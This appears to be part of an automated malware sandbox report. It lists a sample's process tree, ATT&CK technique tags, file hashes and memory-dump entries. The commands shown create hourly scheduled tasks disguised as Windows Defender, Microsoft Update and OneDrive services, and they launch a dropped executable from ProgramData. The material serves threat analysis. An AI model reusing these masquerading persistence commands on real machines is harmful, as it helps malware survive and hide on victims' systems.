SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:1044

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk8848" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:1956

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk8848" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:844

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk6339" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:748

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk6339" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:1092

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk8419" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:1212

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk8419" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:788

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk3217" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:320

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk3217" /TR "C:\ProgramData\Dllhost\dllhost.exe"
4⤵
- Creates scheduled task(s)
PID:1200

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3⤵
PID:1712

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
3⤵
- Loads dropped DLL
PID:1200

C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:1956

C:\ProgramData\Dllhost\winlogson.exe
C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
4⤵
- Executes dropped EXE
PID:872

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
3⤵
PID:1156

C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:2012

C:\ProgramData\Dllhost\winlogson.exe
C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
4⤵
- Executes dropped EXE
PID:968

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
3⤵
PID:856

C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:1916

C:\ProgramData\Dllhost\winlogson.exe
C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
4⤵
- Executes dropped EXE
PID:576

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
3⤵
PID:1964

C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:1064

C:\ProgramData\Dllhost\winlogson.exe
C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
4⤵
- Executes dropped EXE
PID:1940

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
3⤵
PID:1296

C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:1720

C:\ProgramData\Dllhost\winlogson.exe
C:\ProgramData\Dllhost\winlogson.exe --config msi.bin --log off
4⤵
- Executes dropped EXE
PID:1140

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
1⤵
- Creates scheduled task(s)
PID:344

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe
Filesize
80KB

MD5
0426f4269f3de8ffe4f85df9e8454b4b

SHA1
6fa3f292df8c849d10a21140f48d9d64d27870fe

SHA256
ee0a13f5d66a499fc53678ba0e4f55f769ecb8a883d90f6025cd62c7f4ddf0ad

SHA512
566b6711569011ac26294ff00ce8c06667b0dd387a89ef5e49847138ad5a25144f13a1f58bac763bc3d3d454f3ba068494e08b702f5d3e4005a5cb1feab54d02

Download Submit
C:\ProgramData\Dllhost\dllhost.exe
Filesize
80KB

MD5
0426f4269f3de8ffe4f85df9e8454b4b

SHA1
6fa3f292df8c849d10a21140f48d9d64d27870fe

SHA256
ee0a13f5d66a499fc53678ba0e4f55f769ecb8a883d90f6025cd62c7f4ddf0ad

SHA512
566b6711569011ac26294ff00ce8c06667b0dd387a89ef5e49847138ad5a25144f13a1f58bac763bc3d3d454f3ba068494e08b702f5d3e4005a5cb1feab54d02

Download Submit
C:\ProgramData\Dllhost\winlogson.exe
Filesize
7.9MB

MD5
ae6c92c8073b1239390369d3ed93538f

SHA1
a76ea83bdcfa472cd593363e9bb254df494a5577

SHA256
d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

SHA512
59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

Download Submit
C:\ProgramData\Dllhost\winlogson.exe
Filesize
7.9MB

MD5
ae6c92c8073b1239390369d3ed93538f

SHA1
a76ea83bdcfa472cd593363e9bb254df494a5577

SHA256
d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

SHA512
59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

Download Submit
C:\ProgramData\Dllhost\winlogson.exe
Filesize
7.9MB

MD5
ae6c92c8073b1239390369d3ed93538f

SHA1
a76ea83bdcfa472cd593363e9bb254df494a5577

SHA256
d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

SHA512
59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

Download Submit
C:\ProgramData\Dllhost\winlogson.exe
Filesize
7.9MB

MD5
ae6c92c8073b1239390369d3ed93538f

SHA1
a76ea83bdcfa472cd593363e9bb254df494a5577

SHA256
d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

SHA512
59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

Download Submit
C:\ProgramData\Dllhost\winlogson.exe
Filesize
7.9MB

MD5
ae6c92c8073b1239390369d3ed93538f

SHA1
a76ea83bdcfa472cd593363e9bb254df494a5577

SHA256
d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

SHA512
59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

Download Submit
C:\ProgramData\HostData\logs.uce
Filesize
503B

MD5
8b078b9c907544907733f5f47030bcb7

SHA1
0c45a6f025053768758df477c4812c5933a8e366

SHA256
d8c7f0f440d786c3ebc13a59eb5e99d31e34c89cb47603f4f790da54707c34df

SHA512
3ab98331ab7913bdafac180a3976b9c8bb24c68c1aeb109f5c18939d5725f4c38d81565551f9b2dba297e16d71c7ece671cda2ca3d101ec20d957cc7a160db41

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
60KB

MD5
b9f21d8db36e88831e5352bb82c438b3

SHA1
4a3c330954f9f65a2f5fd7e55800e46ce228a3e2

SHA256
998e0209690a48ed33b79af30fc13851e3e3416bed97e3679b6030c10cab361e

SHA512
d4a2ac7c14227fbaf8b532398fb69053f0a0d913273f6917027c8cadbba80113fdbec20c2a7eb31b7bb57c99f9fdeccf8576be5f39346d8b564fc72fb1699476

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
e8329367796153225ca3a9844cca4caf

SHA1
7030dccd334e3088aa7b3b99c72cb97491d3383e

SHA256
c37cbdd0d27453c4996796faf55769fc3730fdf0522a39c3d94b6fc35cf55de9

SHA512
db8c135de39e53472ffc3aa2fc12b42f25a7751e496fe56af41c8429dd6fb8ed364d56cfb649b895183370e050dd2560b9819317345b184d2893d47c0c78fc46

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
79f19385659c9a7cfef297da702d8cc5

SHA1
51a95396af444329f0984d4b925641cd05ff5ea8

SHA256
d46a555299b9d1f20553b9bef872019ff08d8f82ece63c0f592a85da4a914f8d

SHA512
2fa056e5d3a5459c0f48903f25ffbcbd2282797b1c695b4e75110cb2656d69931cac1c8ce35cd48b44a22d307e7a70d7e657582aecdb2755962821dca5d00fda

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
79f19385659c9a7cfef297da702d8cc5

SHA1
51a95396af444329f0984d4b925641cd05ff5ea8

SHA256
d46a555299b9d1f20553b9bef872019ff08d8f82ece63c0f592a85da4a914f8d

SHA512
2fa056e5d3a5459c0f48903f25ffbcbd2282797b1c695b4e75110cb2656d69931cac1c8ce35cd48b44a22d307e7a70d7e657582aecdb2755962821dca5d00fda

Download Submit
\ProgramData\Dllhost\dllhost.exe
Filesize
80KB

MD5
0426f4269f3de8ffe4f85df9e8454b4b

SHA1
6fa3f292df8c849d10a21140f48d9d64d27870fe

SHA256
ee0a13f5d66a499fc53678ba0e4f55f769ecb8a883d90f6025cd62c7f4ddf0ad

SHA512
566b6711569011ac26294ff00ce8c06667b0dd387a89ef5e49847138ad5a25144f13a1f58bac763bc3d3d454f3ba068494e08b702f5d3e4005a5cb1feab54d02

Download Submit
\ProgramData\Dllhost\winlogson.exe
Filesize
7.9MB

MD5
ae6c92c8073b1239390369d3ed93538f

SHA1
a76ea83bdcfa472cd593363e9bb254df494a5577

SHA256
d8d0e8ce7d532250713c7ac9c3e3d144463ce9f47bbf5bd6fc3bb939c739c1a0

SHA512
59de08ea3849243addb3b6aaa2b3ebf71a271eee77239bea0dd190d446a6eec56fd7c5b4fa3668c14074f33f06ab1f011baa0ac2266f6d2d33eb59847841c350

Download Submit
memory/320-90-0x0000000000000000-mapping.dmp

Download
memory/344-92-0x0000000000000000-mapping.dmp

Download
memory/432-100-0x0000000000000000-mapping.dmp

Download
memory/576-117-0x0000000000000000-mapping.dmp

Download
memory/656-65-0x0000000000000000-mapping.dmp

Download
memory/656-68-0x000000006F3B0000-0x000000006F95B000-memory.dmp

Filesize
5.7MB

Download
memory/748-93-0x0000000000000000-mapping.dmp

Download
memory/788-97-0x0000000000000000-mapping.dmp

Download
memory/824-54-0x00000000000E0000-0x00000000000EA000-memory.dmp

Filesize
40KB

Download
memory/824-55-0x00000000750C1000-0x00000000750C3000-memory.dmp

Filesize
8KB

Download
memory/828-56-0x0000000000000000-mapping.dmp

Download
memory/844-95-0x0000000000000000-mapping.dmp

Download
memory/856-115-0x0000000000000000-mapping.dmp

Download
memory/872-109-0x0000000000310000-0x0000000000330000-memory.dmp

Filesize
128KB

Download
memory/872-91-0x0000000000000000-mapping.dmp

Download
memory/872-107-0x0000000000000000-mapping.dmp

Download
memory/880-85-0x0000000000000000-mapping.dmp

Download
memory/968-112-0x0000000000000000-mapping.dmp

Download
memory/1012-80-0x0000000000000000-mapping.dmp

Download
memory/1044-96-0x0000000000000000-mapping.dmp

Download
memory/1064-121-0x0000000000000000-mapping.dmp

Download
memory/1092-99-0x0000000000000000-mapping.dmp

Download
memory/1140-127-0x0000000000000000-mapping.dmp

Download
memory/1156-110-0x0000000000000000-mapping.dmp

Download
memory/1180-82-0x0000000000000000-mapping.dmp

Download
memory/1200-98-0x0000000000000000-mapping.dmp

Download
memory/1200-104-0x0000000000000000-mapping.dmp

Download
memory/1212-94-0x0000000000000000-mapping.dmp

Download
memory/1296-125-0x0000000000000000-mapping.dmp

Download
memory/1340-70-0x0000000000000000-mapping.dmp

Download
memory/1340-74-0x0000000000450000-0x0000000000456000-memory.dmp

Filesize
24KB

Download
memory/1340-73-0x0000000000C40000-0x0000000000C5A000-memory.dmp

Filesize
104KB

Download
memory/1484-78-0x0000000000000000-mapping.dmp

Download
memory/1496-77-0x0000000000000000-mapping.dmp

Download
memory/1576-76-0x0000000000000000-mapping.dmp

Download
memory/1604-81-0x0000000000000000-mapping.dmp

Download
memory/1712-83-0x0000000000000000-mapping.dmp

Download
memory/1720-126-0x0000000000000000-mapping.dmp

Download
memory/1836-86-0x0000000000000000-mapping.dmp

Download
memory/1868-64-0x000000006F760000-0x000000006FD0B000-memory.dmp

Filesize
5.7MB

Download
memory/1868-61-0x0000000000000000-mapping.dmp

Download
memory/1872-79-0x0000000000000000-mapping.dmp

Download
memory/1916-116-0x0000000000000000-mapping.dmp

Download
memory/1940-122-0x0000000000000000-mapping.dmp

Download
memory/1956-89-0x0000000000000000-mapping.dmp

Download
memory/1956-105-0x0000000000000000-mapping.dmp

Download
memory/1964-120-0x0000000000000000-mapping.dmp

Download
memory/1988-88-0x0000000000000000-mapping.dmp

Download
memory/1992-87-0x0000000000000000-mapping.dmp

Download
memory/2000-57-0x0000000000000000-mapping.dmp

Download
memory/2012-111-0x0000000000000000-mapping.dmp

Download
memory/2032-84-0x0000000000000000-mapping.dmp

Download
memory/2040-60-0x000000006F660000-0x000000006FC0B000-memory.dmp

Filesize
5.7MB

Download
memory/2040-58-0x0000000000000000-mapping.dmp

Download